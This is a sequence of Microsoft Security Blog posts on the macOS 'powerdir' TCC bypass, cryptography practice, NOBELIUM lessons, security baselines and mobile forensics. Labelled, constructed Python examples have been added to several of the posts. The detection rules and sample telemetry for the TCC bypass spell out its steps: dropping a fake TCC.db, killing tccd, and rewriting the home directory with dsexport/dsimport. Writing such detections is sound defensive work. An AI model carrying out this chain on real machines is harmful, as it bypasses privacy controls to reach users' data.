  • Dropping a new TCC.db file with an appropriate directory structure
  • Killing an existing tccd instance
  • Suspicious Directory Services invocations such as dsimport and dsexport

By generically detecting behavior associated with CVE-2020-9934 (that is, dropping a new TCC.db file fires an alert), Defender for Endpoint provided protection against these exploits before the powerdir vulnerability was patched. This is a testament to Defender for Endpoint’s capabilities: with strong, intelligent generalization, it will detect similar bypass vulnerabilities discovered in the future.
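
As an added example (not Defender for Endpoint’s detection logic), the rules below encode the three behaviours just listed and run them over constructed telemetry. Every event, process name, path and command line in it is made up for the illustration; only the behaviours being matched come from the text.

```python
"""Behaviour-based detection for the TCC-bypass activities listed above.

Added example: this is not Defender for Endpoint's detection logic. The
telemetry below is constructed to resemble a process/file event feed; field
names, paths and command lines are invented, only the matched behaviours
come from the text.
"""

TCC_DB_SUFFIX = "/Library/Application Support/com.apple.TCC/TCC.db"
TCC_DAEMON = "tccd"
DS_TOOLS = {"dsimport", "dsexport"}

# Constructed sample telemetry.
SAMPLE_EVENTS = [
    # Legitimate: tccd itself (re)creating the user database.
    {"type": "file_create", "process": "tccd",
     "path": "/Users/alice/Library/Application Support/com.apple.TCC/TCC.db"},
    # Suspicious: an unrelated process staging a TCC.db under a new "home".
    {"type": "file_create", "process": "updater-helper",
     "path": "/private/tmp/stage/Library/Application Support/com.apple.TCC/TCC.db"},
    {"type": "process_exec", "process": "dsexport",
     "cmdline": "dsexport /private/tmp/alice.txt"},
    {"type": "process_exec", "process": "dsimport",
     "cmdline": "dsimport /private/tmp/alice.txt"},
    # Suspicious: the user's tccd being killed so it re-reads the database.
    {"type": "signal", "process": "updater-helper", "target": "tccd", "signal": 9},
    # Benign noise.
    {"type": "process_exec", "process": "ls", "cmdline": "ls -la /Users/alice"},
]


def rule_tcc_db_drop(ev):
    """A TCC.db created or written by anything other than tccd."""
    if ev["type"] in ("file_create", "file_write") \
            and ev["path"].endswith(TCC_DB_SUFFIX) \
            and ev["process"] != TCC_DAEMON:
        return "TCC.db dropped by process %r" % ev["process"]
    return None


def rule_tccd_killed(ev):
    """A signal delivered to tccd (the bypass restarts it to load the fake db)."""
    if ev["type"] == "signal" and ev.get("target") == TCC_DAEMON:
        return "tccd terminated by process %r" % ev["process"]
    return None


def rule_ds_tools(ev):
    """Directory Services export/import, used to rewrite the home directory."""
    if ev["type"] == "process_exec" and ev["process"] in DS_TOOLS:
        return "Directory Services tool %s executed" % ev["process"]
    return None


RULES = (rule_tcc_db_drop, rule_tccd_killed, rule_ds_tools)


def detect(events):
    """Return one (event_index, rule_name, message) tuple per rule match."""
    findings = []
    for index, ev in enumerate(events):
        for rule in RULES:
            message = rule(ev)
            if message:
                findings.append((index, rule.__name__, message))
    return findings


def severity(findings):
    """Escalate when a dropped TCC.db is paired with a tccd restart or a
    Directory Services rewrite: that combination is the bypass chain itself."""
    rules_hit = {name for _, name, _ in findings}
    if "rule_tcc_db_drop" in rules_hit and rules_hit & {"rule_tccd_killed", "rule_ds_tools"}:
        return "high"
    if rules_hit:
        return "medium"
    return "none"


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for index, name, message in hits:
        print(f"event {index}: {name}: {message}")
    print("severity:", severity(hits))
```

The single-event rules are deliberately broad (a TCC.db written by anything but tccd is rare on a healthy machine); the correlation in severity() is what separates the full bypass chain from an isolated oddity.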

Figure 7. Microsoft Defender for Endpoint detecting a potential TCC bypass (screenshot).

Learn how Microsoft Defender for Endpoint delivers a complete endpoint security solution across all platforms.

Jonathan Bar Or

Microsoft 365 Defender Research Team

The post New macOS vulnerability, “powerdir,” could lead to unauthorized user data access appeared first on Microsoft Security Blog.

What you need to know about how cryptography impacts your security strategy

January 4th, 2022

The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the latest post of our Voice of the Community blog series, Microsoft Security Product Marketing Manager Natalia Godyla talks with Taurus SA Co-founder and Chief Security Officer Jean-Philippe “JP” Aumasson, author of “Serious Cryptography.” In this blog post, JP shares insights on learning and applying cryptography knowledge to strengthen your cybersecurity strategy.

Natalia: What drew you to the discipline of cryptography?

JP: People often associate cryptography with mathematics. In my case, I was not good at math when I was a student, but I was fascinated by the applications of cryptography and everything that has to do with secrecy. Cryptography is sometimes called the science of secrets. I was also interested in hacking techniques. At the beginning of the internet, I liked reading online documentation magazines and playing with hacking tools, and cryptography was part of this world.

Natalia: In an organization, who should be knowledgeable about the fundamentals of cryptography?

JP: If you had asked me 10 to 15 years ago, I might have said all you need is to have an in-house cryptographer who specializes in crypto and other people can ask them questions. Today, however, cryptography has become substantially more integrated into several components that we work with and those engineers must develop.

The good news is that crypto is far more approachable than it used to be, and is better documented. The software libraries and APIs are much easier to work with for non-specialists. So, I believe that all the engineers who work with software—from a development perspective, a development operations (DevOps) perspective, or even quality testing—need to know some basics of what crypto can and cannot do and the main crypto concepts and tools.

Natalia: Who is responsible for educating engineering on cryptography concepts?

JP: It typically falls on the security team—for example, through security awareness training. Before starting development, you create the functional requirements driven by business needs. You also define the security goals and security requirements, such as personal data, that must be encrypted at rest and in transit with a given level of security. It’s truly a part of security engineering and security architecture. I advocate for teaching people fundamentals, such as confidentiality, integrity, authentication, and authenticated encryption.

As a second step, you can think of how to achieve security goals thanks to cryptography. Concretely, you have to protect some data, and you might think, “What does it mean to encrypt the data?” It means choosing a cipher with the right parameters, like the right key size. You may be restricted by the capability of the underlying hardware and software libraries, and in some contexts, you may have to use Federal Information Processing Standard (FIPS) certified algorithms.

Also, encryption may not be enough. Most of the time, you also need to protect the integrity of the data, which means using an authentication mechanism. The modern way to realize this is by using an algorithm called an authenticated cipher, which protects confidentiality and authenticity at the same time, whereas the traditional way to achieve this is to combine a cipher and a message authentication code (MAC).

Natalia: What are common mistakes practitioners tend to make?

JP: People often get password protection wrong. First, you need to hash passwords, not encrypt them—except in some niche cases. Second, to hash passwords you should not use a general-purpose hash function such as SHA-256 or BLAKE2. Instead, you should use a password hashing function, which is a specific kind of hashing algorithm designed to be slow and sometimes use a lot of memory, to make password cracking harder.

A second thing people tend to get wrong is authenticating data using a MAC algorithm. A common MAC construction is the hash-based message authentication code (HMAC) standard. However, people tend to believe that HMAC means the same thing as MAC. It’s only one possible way to create a MAC, among several others. Anyway, as previously discussed, today you often won’t need a MAC because you’ll be using an authenticated cipher, such as AES-GCM.
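
As an added example, not code from the interview, the following standard-library Python puts both of JP’s points into practice: scrypt (a memory-hard password hash) rather than SHA-256 for password storage, and HMAC-SHA-256 as one concrete MAC construction, verified in constant time. The record format and cost parameters are choices made for this example.

```python
"""Password storage and data authentication done the way the interview advises.

Added example using only the Python standard library. The 'scrypt$N$r$p$salt$digest'
record layout and the cost parameters below are this example's own choices.
"""
import hashlib
import hmac
import secrets

SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1   # ~16 MiB of memory per hash
KEY_LEN = 32


def hash_password(password, salt=None):
    """Return a self-describing record; a fresh random salt is drawn per call."""
    if salt is None:
        salt = secrets.token_bytes(16)
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=KEY_LEN)
    return "$".join(["scrypt", str(SCRYPT_N), str(SCRYPT_R), str(SCRYPT_P),
                     salt.hex(), digest.hex()])


def verify_password(password, record):
    """Re-derive with the parameters stored in the record and compare in constant time."""
    try:
        algo, n, r, p, salt_hex, digest_hex = record.split("$")
    except ValueError:
        return False
    if algo != "scrypt":          # refuse records made with anything else
        return False
    expected = bytes.fromhex(digest_hex)
    candidate = hashlib.scrypt(password.encode("utf-8"), salt=bytes.fromhex(salt_hex),
                               n=int(n), r=int(r), p=int(p), dklen=len(expected))
    return hmac.compare_digest(candidate, expected)


def mac_tag(key, message):
    """HMAC-SHA-256: one MAC among several, as JP notes, not 'the' MAC."""
    return hmac.new(key, message, hashlib.sha256).digest()


def mac_verify(key, message, tag):
    """Constant-time comparison; a plain == would leak how many bytes matched."""
    return hmac.compare_digest(mac_tag(key, message), tag)


def demo():
    record = hash_password("correct horse battery staple")
    key = secrets.token_bytes(32)           # a CSPRNG, as the interview recommends
    message = b"amount=100;to=alice"
    tag = mac_tag(key, message)
    return {
        "password_ok": verify_password("correct horse battery staple", record),
        "password_wrong": verify_password("Correct horse battery staple", record),
        "mac_ok": mac_verify(key, message, tag),
        "mac_tampered": mac_verify(key, b"amount=900;to=alice", tag),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Storing N, r and p inside the record lets the cost be raised for new passwords later without breaking verification of existing ones; the same idea applies to swapping HMAC for another MAC, provided the tag is still compared with compare_digest.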

Natalia: How does knowledge of cryptography impact security strategy?

JP: Knowledge of cryptography can help you protect the information more cost-effectively. People can be tempted to put encryption layers everywhere but throwing crypto at a problem does not necessarily solve it. Even worse, once you choose to encrypt something, you have a second problem—key management, which is always the hardest part of any cryptographic architecture. So, knowing when and how to use cryptography will help you achieve sound risk management and minimize the complexity of your systems. In the long run, it pays off to do the right thing.

For example, if you generate random data or bytes, you must use a random generator. Auditors and clients might be impressed if you tell them that you use a “true” hardware generator or even a quantum generator. These might sound impressive, but from a risk management perspective, you’re often better off using an established open-source generator, such as that of the OpenSSL toolkit.

Natalia: What are the biggest trends in cryptography?

JP: One trend is post-quantum cryptography, which is about designing cryptographic algorithms that would not be compromised by a quantum computer. We don’t have quantum computers yet, and the big question is when, if ever, they will arrive. Post-quantum cryptography, consequently, can be seen as insurance.

Two other major trends are zero-knowledge proofs and multi-party computation. These are advanced techniques that have a lot of potential to scale decentralized applications. For example, zero-knowledge proofs can allow you to verify that the output of a program is correct without re-computing the program by verifying a short cryptographic proof, which takes less memory and computation. Multi-party computation, on the other hand, allows a set of parties to compute the output of a function without knowing the input values. It can be loosely described as executing programs on encrypted data. Multi-party computation is proposed as a key technology in managed services and cloud applications to protect sensitive data and avoid single points of failure.

One big driver of innovation is the blockchain space, where zero-knowledge proofs and multi-party computation are being deployed to solve very real problems. For example, the Ethereum blockchain uses zero-knowledge proofs to improve the scalability of the network, while multi-party computation can be used to distribute the control of cryptocurrency wallets. I believe we will see a lot of evolution in zero-knowledge proofs and multi-party computation in the next 10 to 20 years, be it in the core technology or the type of application.

It would be difficult to train all engineers in these complex cryptographic concepts. So, we must design systems that are easy to use but can securely do complex and sophisticated operations. This might be an even bigger challenge than developing the underlying cryptographic algorithms.

Natalia: What’s your advice when evaluating new cryptographic solutions?

JP: As in any decision-making process, you need reliable information. Sources can be online magazines, blogs, or scientific journals. I recommend involving cryptography specialists to:

  1. Gain a clear understanding of the problem and the solution needed.
  2. Perform an in-depth evaluation of the third-party solutions offered.

For example, if a vendor tells you that they use a secret algorithm, it’s usually a major red flag. What you want to hear is something like, “We use the advanced encryption standard with a key of 256 bits and an implementation protected against side-channel attacks.” Indeed, your evaluation should not be about the algorithms, but how they are implemented. You can use the safest algorithm on paper, but if your implementation is not secure, then you have a problem.

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post What you need to know about how cryptography impacts your security strategy appeared first on Microsoft Security Blog.

Azure App Service Linux source repository exposure

December 22nd, 2021

MSRC was informed by Wiz.io, a cloud security vendor, under Coordinated Vulnerability Disclosure (CVD) of an issue where customers can unintentionally configure the .git folder to be created in the content root, which would put them at risk for information disclosure. This, when combined with an application configured to serve static content, makes it possible …



Security baseline for Windows 10, version 21H2

December 20th, 2021

We are pleased to announce the release of the Windows 10, version 21H2 security baseline package!

Please download the content from the Microsoft Security Compliance Toolkit, test the recommended configurations, and customize / implement as appropriate.

This Windows 10 feature update brings very few new policy settings. One setting has been added for this release for printer driver installation restrictions (which was also added to the Windows 11 release). Additionally, all Microsoft Edge Legacy settings have been removed.

Restrict Driver Installations

In July, a Knowledge Base article and subsequent patch were released for CVE-2021-34527, more commonly known as “PrintNightmare”. We have added a new setting to the MS Security Guide (Administrative Templates\Printers\Limits print driver installation to Administrators) and enforced its enablement. Note that this setting was previously a custom setting in SecGuide.admx/l and has since moved inbox.

Microsoft Edge Legacy

Microsoft Edge Legacy (EdgeHTML-based) reached end of support on March 9, 2021 and is not part of Windows 10 21H2. Therefore, the settings that supported it have been removed from the baseline. Going forward, please use the new Microsoft Edge (Chromium-based) baseline, which is on a separate release cadence and available as part of the Microsoft Security Compliance Toolkit.

Tamper Protection

While you are enabling the Microsoft Security Baseline, make sure to enable Microsoft Defender for Endpoint’s “Tamper Protection” to add a layer of protection against Human Operated Ransomware.

As a reminder, our security baselines for the endpoint also include Microsoft 365 Apps for Enterprise, which we recently released, as well as Microsoft Edge and Windows Update.

Please let us know your thoughts by commenting on this post or via the Security Baseline Community.


The final report on NOBELIUM’s unprecedented nation-state attack

December 15th, 2021

This is the final post in a four-part series on the NOBELIUM nation-state cyberattack. In December 2020, Microsoft began sharing details with the world about what became known as the most sophisticated nation-state cyberattack in history. Microsoft’s four-part video series “Decoding NOBELIUM” pulls the curtain back on the NOBELIUM incident and how world-class threat hunters from Microsoft and around the industry came together to take on the most sophisticated nation-state attack in history. In this last post, we’ll reflect on lessons learned as covered in the fourth episode of the docuseries. 

Nation-state attacks are a serious and growing threat that organizations of all sizes face. Their primary objective is to gain strategic advantage for their country, such as by stealing secrets, gathering cyber intelligence, conducting reconnaissance, or disrupting operations. These efforts are typically conducted by state-sponsored actors with significant expertise and funding, making them a particularly challenging adversary to defend against.

NOBELIUM, a Russian-linked group, is perhaps best known for the widespread SolarWinds supply chain breach. The incident was part of an even larger and more advanced campaign that had been quietly underway for more than a year. As details of this attack were uncovered, it became clear that it was the most sophisticated nation-state cyberattack in history.

In the final episode of our “Decoding NOBELIUM” series, we provide an after-action report that explores Microsoft’s findings and discusses lessons learned.

NOBELIUM deployed extensive tactics

Let’s start by reviewing the key stages of the attack.

The intrusion

It’s critical to understand how NOBELIUM achieved penetration into environments. Going beyond the supply chain compromise, this actor also deployed many common-place tactics like password spraying or exploiting the vulnerabilities of unpatched devices to steal credentials and gain access to systems. Ultimately, NOBELIUM leveraged a wide range of techniques to achieve penetration and adapted their toolset to each victim’s unique environment in order to achieve their goals.

The exploitation

Once NOBELIUM had gained entry, they followed the typical pattern for internal reconnaissance: discover the elevated accounts, find out which machines were there, and create a sophisticated map to understand how to reach their targets. They demonstrated extensive knowledge of enterprise environments and cybersecurity systems by evading defenses, masking activities in regular system processes, and hiding malware under many layers of code.

The exfiltration

Armed with an understanding of their target’s environment, NOBELIUM executed their plan—gaining access to their source codes, harvesting emails, or stealing production secrets.

NOBELIUM demonstrated patience and stealth

The NOBELIUM group moved methodically to avoid getting caught. “They were so deliberate and careful about what they did. It wasn’t like a smash and grab, where they came in and just vacuumed up everything and fled,” said Security Analyst Joanne of the Microsoft Digital Security and Resilience (DSR) Security Operations Center (SOC) Hunt Team.

They took time to move undetected through networks, gathering information and gaining access to privileged networks. For example, they prevented organizations’ endpoint detection and response (EDR) solutions from launching at system startup. NOBELIUM then waited up to a month for computers to be rebooted on a patch day and took advantage of vulnerable machines that hadn’t been patched.

“The adversary showed discipline in siloing all of the technical indicators that would give up their presence,” said John Lambert, General Manager of the Microsoft Threat Intelligence Center. “Malware was named different things. It was compiled in different ways. The command and control domains they would use differed per victim. As they moved laterally within a network from machine to machine, NOBELIUM took great pains to clean up after each step.”

Preparing for future nation-state attacks

When adversaries take this much care in hiding their activities, it can take the detection of many seemingly benign activities across different vectors pulled together to highlight one overall technique.

“In order to respond to an attack like NOBELIUM, with its scope and breadth and sophistication, you need to have visibility into various entities across your entire digital estate,” explains Sarah Fender, Partner Group Program Manager for Microsoft Sentinel. “You need to have visibility into security data and events relating to users and endpoints, infrastructure, on-premises and in the cloud, and the ability to quickly analyze that data.”

NOBELIUM leveraged users and credentials as a critical vector for intrusion and escalation. Identity-based attacks are on the rise. “Once I can authenticate into your environment, I don’t need malware anymore, so that means monitoring behaviors,” says Roberto, Principal Consultant and Lead Investigator for Microsoft’s Detection and Response Team. “Building a profile for when Roberto’s using his machine, he accesses these 25 resources, and he does these kinds of things and he’s never been in these four countries. If I ever see something that doesn’t fit that pattern, I need to alert on it.” 

Bottom line: ensure you are protecting your identities.
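
An added illustration (not Microsoft DART tooling) of the profiling Roberto describes: build a per-user baseline of the resources and countries seen in past sign-ins, then alert only on events that fall outside it. All sign-in records are constructed for the example, and the MIN_HISTORY threshold, which keeps immature profiles from generating noise, is an assumption of this example.

```python
"""Per-user behavioural baseline for identity events.

Added example in the spirit of the profiling described above; it is not
Microsoft DART tooling. Every record below is constructed (user names,
resources and country codes are made up).
"""
from collections import defaultdict

# Constructed history: (user, resource, country) for past sign-ins.
HISTORY = [
    ("roberto", "mail", "US"), ("roberto", "sharepoint", "US"),
    ("roberto", "vpn", "US"), ("roberto", "mail", "CA"),
    ("roberto", "git", "US"), ("roberto", "mail", "US"),
    ("dana", "mail", "FR"),   # too little history to baseline confidently
]

MIN_HISTORY = 5   # assumption: below this many events a profile is immature


def build_profiles(events):
    """Summarise each user's history as the sets of resources and countries seen."""
    profiles = defaultdict(lambda: {"resources": set(), "countries": set(), "count": 0})
    for user, resource, country in events:
        profile = profiles[user]
        profile["resources"].add(resource)
        profile["countries"].add(country)
        profile["count"] += 1
    return dict(profiles)


def score_event(profiles, event):
    """Return the ways an event departs from the user's baseline (empty = in profile).

    Users with an immature profile are not scored: judging them against a
    handful of events would alert on almost everything they do.
    """
    user, resource, country = event
    profile = profiles.get(user)
    if profile is None:
        return ["no baseline for user"]
    if profile["count"] < MIN_HISTORY:
        return []
    reasons = []
    if resource not in profile["resources"]:
        reasons.append("first access to resource %s" % resource)
    if country not in profile["countries"]:
        reasons.append("first sign-in from country %s" % country)
    return reasons


def alerts(profiles, new_events):
    """Pair each anomalous event with its reasons; in-profile events are dropped."""
    out = []
    for event in new_events:
        reasons = score_event(profiles, event)
        if reasons:
            out.append((event, reasons))
    return out


if __name__ == "__main__":
    profiles = build_profiles(HISTORY)
    today = [("roberto", "mail", "US"), ("roberto", "hr-db", "NZ"), ("dana", "mail", "FR")]
    for event, reasons in alerts(profiles, today):
        print(event, "->", "; ".join(reasons))
```

Because a credentialed intruder needs no malware, the only signal left is the event that does not fit the account’s own history; the two reasons raised together for the constructed “hr-db from NZ” event are the kind of pattern break Roberto says must be alerted on.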

Finally, if we’ve learned anything, it’s that we need to take care of our security teams, especially during a cybersecurity incident. 

“Defender fatigue is a real thing,” says Lambert. “You have to be able to invest in those defenders so that they can surge when they need to. Security, like other professions, is not just a job, it’s also a calling. But it also leads to fatigue and exhaustion if the incident drumbeat is too strong. You have to have reserves and plan for that so that you can support your defenders and rest them in between incidents.”

As we prepare for future attacks, it comes down to joining forces. 

“When I think about what this incident means going forward, it certainly reinforces the need for the world to work together on these threats,” explains Lambert. “No one company sees it all and it is very important, especially with sophisticated threats, to be able to work very quickly with lines of trust established. This is not just about companies working together, it’s also about individuals trusting each other, impacted companies, fellow security industry companies, and government institutions.”

How can you protect your organization and defenders?

Learn more in the final episode of our four-part video series “Decoding NOBELIUM,” where security professionals give insights from the after-action report on NOBELIUM. Thanks for joining us for this series and check out the other posts in the series:

Microsoft is committed to helping organizations stay protected from cyberattacks, whether cybercriminal or nation-state. Consistent with our mission to provide security for all, Microsoft will use our leading threat intelligence and a global team of dedicated cybersecurity defenders to partner across the security industry and help protect our customers and the world. Just some recent examples of Microsoft’s efforts to combat nation-state attacks include:

  • The investigation of ongoing targeted activity by NOBELIUM against privileged accounts of service providers to gain access to downstream customers.
  • The September 2021 discovery and investigation of a NOBELIUM malware referred to as FoggyWeb.
  • The May 2021 profiling of NOBELIUM’s early-stage toolset of EnvyScout, BoomBox, NativeZone, and VaporRage.
  • Issuing more than 1,600 notifications to more than 40 IT companies alerting them to targeting by several Iranian threat groups (from May through October, those threats were 10 to 13 percent of the total notifications).
  • The seizure of websites operated by NICKEL, a China-based threat actor, and the disruption of ongoing attacks targeting organizations in 29 countries.
  • The investigation of Iran-linked DEV-0343, conducting password spraying focused on United States and Israeli defense technology companies, Persian Gulf ports of entry, and global maritime transportation companies with a business presence in the Middle East.

For immediate support, visit the Microsoft Security Response Center (MSRC) where you can report an issue and get guidance from the latest security reports and Microsoft Security Response Center blog posts.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post The final report on NOBELIUM’s unprecedented nation-state attack appeared first on Microsoft Security Blog.

Security baseline for Microsoft 365 Apps for enterprise, v2112

December 14th, 2021

Microsoft is pleased to announce the release of the recommended security configuration baseline settings for Microsoft 365 Apps for enterprise, version 2112. Please download the content from the Microsoft Security Compliance Toolkit, test the recommended configurations, and implement as appropriate.

This baseline builds on the previous Office baseline, released in April 2021. The highlights of this baseline include:

  • Excel policy name change to “Macro Notification Settings” from “VBA Macro Notification Settings”. This was done in conjunction with adding the new policy to block Excel 4.0 macros.
  • Expanded macro protection isolating and blocking Excel 4.0 macros. The Excel team created a new policy: “Prevent Excel from running XLM macros”. In the Trust Center this is an additional check box in the Macros Tab. We are also blocking Excel 4.0 macros by default in Office version 2109 or later, starting with Current Channel (with other channels at a later time).
  • New attributes added to Administrative Template files (ADMX/ADML) for Microsoft 365 Apps for enterprise to easily identify Security baselines and the area the policies are helping to protect.
  • Name changes of GPOs included in this baseline – to align with Microsoft branding requirements we have modified the names of the GPOs included in this baseline, see below.

The recommended settings in this security baseline correspond with the administrative templates version 5263, released December 13, 2021.

Deployment options for the baseline

IT Admins can apply baseline settings in different ways. Depending on the method(s) chosen, different registry keys will be written, and they are observed in order of precedence: Office cloud policies override ADMX/Group Policies, which override end-user settings in the Trust Center.

  • Cloud policies may be deployed with the Office cloud policy service for policies in HKCU. Cloud policies apply to a user on any device accessing files in Office apps with their AAD account. In Office cloud policy service, you can filter the Recommendation column to display the current Security Baselines, and within each policy’s context pane the recommended baseline setting is set by default. Learn more about Office cloud policy service.
  • ADMX policies may be deployed with Microsoft Endpoint Manager (MEM) for both HKCU and HKLM policies. These settings are written to the same place as Group Policy, but managed from the cloud in MEM. There are two methods to create and deploy policy configurations: Administrative templates or the settings catalog.
  • Group Policy may be deployed with on-premises AD DS to deploy Group Policy Objects (GPO) to users and computers. The downloadable baseline package includes importable GPOs, a script to apply the GPOs to local policy, a script to import the GPOs into Active Directory Group Policy, an updated custom administrative template (SecGuide.ADMX/L) file, all the recommended settings in spreadsheet form and a Policy Analyzer rules file.

GPOs included in the baseline

Most organizations can implement the baseline’s recommended settings without any problems. However, there are a few settings that will cause operational issues for some organizations. We’ve broken out related groups of such settings into their own GPOs to make it easier for organizations to add or remove these restrictions as a set. The local-policy script (Baseline-LocalInstall.ps1) offers command-line options to control whether these GPOs are installed.

Note: Name change to “MSFT Microsoft 365 Apps v2112”. This GPO set includes “Computer” and “User” GPOs that represent the “core” settings that should be trouble free, and each of these potentially challenging GPOs:

  • “DDE Block – User” is a User Configuration GPO that blocks using DDE to search for existing DDE server processes or to start new ones.

  • “Legacy File Block – User” is a User Configuration GPO that prevents Office applications from opening or saving legacy file formats.

  • “Legacy JScript Block – Computer” is a Computer Configuration GPO that disables legacy JScript execution for websites in the Internet Zone and Restricted Sites Zone.

  • “Require Macro Signing – User” is a User Configuration GPO that disables unsigned macros in each of the Office applications.

Disable Excel 4 Macros


A new Excel policy is available to block Excel 4.0 (XLM) macros separately from VBA macros: “Prevent Excel from running XLM macros”. With this policy, disabling XLM macros no longer affects the VBA macro settings. The same setting is also exposed in the Trust Center, where end users can change it; to prevent that, enforce it through the policy “Prevent Excel from running XLM macros”, which takes precedence over the user’s Trust Center choice.

AREA and AREACATEGORY attributes in ADMX Templates


A new set of attributes has been introduced to allow policies to be tagged for specific scenarios such as Security Baseline, Security, Privacy, Accessibility, etc. These tags will power upcoming features to help admins identify policies by area for easier adoption. You’ll see these new columns in the spreadsheet documentation of the security baselines.

Example:
    <policy name="L_AllowDDE" class="User" Area="Security Baseline" AreaCategory="DDE" displayName="$(string.L_AllowDDE)" explainText="$(string.L_AllowDDEExplain)" presentation="$(presentation.L_AllowDDE)" key="software\policies\microsoft\office\16.0\word\security">
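As an added example (not part of the baseline package or of any Office tooling), the script below parses a constructed ADMX fragment modelled on the element above and lists the policies tagged Area="Security Baseline", grouped by AreaCategory, together with the registry key each one writes and the hive implied by its class. Only the L_AllowDDE element is taken from the page; the other policy names, categories and key paths are hypothetical placeholders that exist solely to exercise the grouping.

```python
"""
Filter ADMX policies by the new Area / AreaCategory attributes.

Added example, not Microsoft's code. SAMPLE_ADMX is a constructed fragment:
the L_AllowDDE <policy> mirrors the element shown on the page; every other
<policy> (and its key path) is a made-up placeholder.
"""
import xml.etree.ElementTree as ET
from collections import defaultdict

# Standard ADMX namespace; the root element's namespace is read back at parse time.
SAMPLE_ADMX = """
<policyDefinitions xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions"
                   revision="1.0" schemaVersion="1.0">
  <policies>
    <policy name="L_AllowDDE" class="User" Area="Security Baseline" AreaCategory="DDE"
            displayName="$(string.L_AllowDDE)" explainText="$(string.L_AllowDDEExplain)"
            presentation="$(presentation.L_AllowDDE)"
            key="software\\policies\\microsoft\\office\\16.0\\word\\security"/>
    <!-- hypothetical placeholders below -->
    <policy name="L_ExamplePrivacy" class="User" Area="Privacy" AreaCategory="Telemetry"
            displayName="$(string.L_ExamplePrivacy)"
            key="software\\policies\\microsoft\\office\\16.0\\common\\privacy"/>
    <policy name="L_ExampleMacro" class="User" Area="Security Baseline" AreaCategory="Macros"
            displayName="$(string.L_ExampleMacro)"
            key="software\\policies\\microsoft\\office\\16.0\\excel\\security"/>
    <policy name="L_Untagged" class="Machine" displayName="$(string.L_Untagged)"
            key="software\\policies\\microsoft\\office\\16.0\\common"/>
  </policies>
</policyDefinitions>
"""


def hive_for(policy_class: str) -> str:
    """Map an ADMX policy class to the registry hive it is written under.

    User -> HKCU, Machine -> HKLM; 'Both' (and anything unknown) may land in either.
    """
    return {"User": "HKCU", "Machine": "HKLM"}.get(policy_class, "HKCU/HKLM")


def policies_by_area(admx_xml: str, area: str) -> dict:
    """Return {AreaCategory: [(name, hive, registry key), ...]} for policies tagged `area`.

    Policies without an Area attribute (older, untagged definitions) are skipped.
    """
    root = ET.fromstring(admx_xml)
    ns = root.tag.split("}")[0].strip("{")  # namespace taken from the root element
    grouped = defaultdict(list)
    for pol in root.iter(f"{{{ns}}}policy"):
        if pol.get("Area") != area:
            continue
        grouped[pol.get("AreaCategory", "(none)")].append(
            (pol.get("name"), hive_for(pol.get("class", "")), pol.get("key"))
        )
    return dict(grouped)


if __name__ == "__main__":
    for category, entries in sorted(policies_by_area(SAMPLE_ADMX, "Security Baseline").items()):
        print(category)
        for name, hive, key in entries:
            print(f"  {name:<16} {hive}\\{key}")
```

Pointing the same function at the real SecGuide.ADMX or Office ADMX files gives an admin the baseline-tagged subset without waiting for the console features the post mentions; a policy that is missing from the output is either untagged or belongs to another Area.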

When can I expect the next release of Microsoft 365 Apps for enterprise Security Baseline?


In the future, we’ll plan to release new security baselines every 6 months, usually in June and December.

If you have questions or issues, please let us know via the Security Baseline Community or this post.


Researcher Spotlight: Dr. Nestori Syynimaa’s Constant Mission Protecting Identities

December 14th, 2021

“When you find the things I find, they really matter. They affect everybody’s security.” Currently streaming: The Expanse and Lost in Space on Netflix Currently listening to: Amorphis, Architects, and Killswitch Engage Currently running: 130 kilometers (or ~80 miles) a month Currently playing: Floorball (a type of floor hockey with five players and a goalkeeper) …


Categories: BlueHat

Your guide to mobile digital forensics

December 14th, 2021

The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the latest Voice of the Community blog series post, Microsoft Security Product Marketing Manager Natalia Godyla talks with Cellebrite Senior Director of Digital Intelligence Heather Mahalik. In this blog post, Heather talks about digital forensics, from technical guidance to hiring best practices, with a special focus on mobile forensics. 

Natalia: What is digital forensics and why is it important?

Heather: Cybersecurity is more about prevention, protection, and defense. Digital forensics is the response and is typically triggered by an incident. There are some people who say, “Oh no, we do things proactively.” For example, someone might be traveling to a foreign country, and they want to know if something is going to land on their mobile device. You may proactively scan or carry out forensics on that device before and then see what changed after. That would be a rare situation, but usually, it’s when an incident occurs and you need someone to come in and clean it up.

Natalia: How does mobile forensics differ from other forms of forensics?

Heather: Mobile forensics is fast-moving. Mobile device companies update devices and operating systems all the time. The applications we rely upon are updating. When I did digital forensics as a whole—computers, PC, and macOS—the updates weren’t the same as on mobile. There are also levels and encryption that keep us out, and they are different on every mobile device.

When I learned forensics in 2002, it was: “Here’s a hard drive. This is how the data is laid out. This is what you can expect every single time.” You can never expect the same thing every single time with mobile forensics. In every single case you work on, there will be a variance that requires you to learn something new. I love it because I can’t get bored, but it’s also frustrating. It’s so hard to say, “OK, I’m now a master.” You’re never a master of mobile forensics.

Natalia: What does the workflow for mobile forensics look like?

Heather: I always use the terminology cradle-to-grave forensics—you get it when it first starts, and you put it to rest with your report. If you are doing beginning to end, you’re starting with the mobile device in front of you. One thing to consider is remote access, which can be good and bad. Some of the third-party applications require that a device connects to a network to extract information, but that goes against everything you’ll read about forensics. Isolate from a network. Make sure it’s protected. No connections to the device.

The next phase is to acquire the data from the device, and there are many different tools and methods to do that. You need as much access to that file system as you can get because we need all the logs in the background to do a thorough analysis.

After that, I recommend triage. Consider how you’re going to solve the who, what, where, when, why, and how. Are there any clues that you can get immediately from that device? Then dive in deeper with your forensics and analytical tools.

Natalia: What’s the best way to approach an investigation?

Heather: There was a study where they had people work on the same case in different ways. One person was given the whole case scenario—“This is what we think happened”—and another person was just asked specific questions—“Please find these things.” In the middle is the best—“We are trying to solve for X. These are the questions that I think will help us get to X. Can you answer them?”

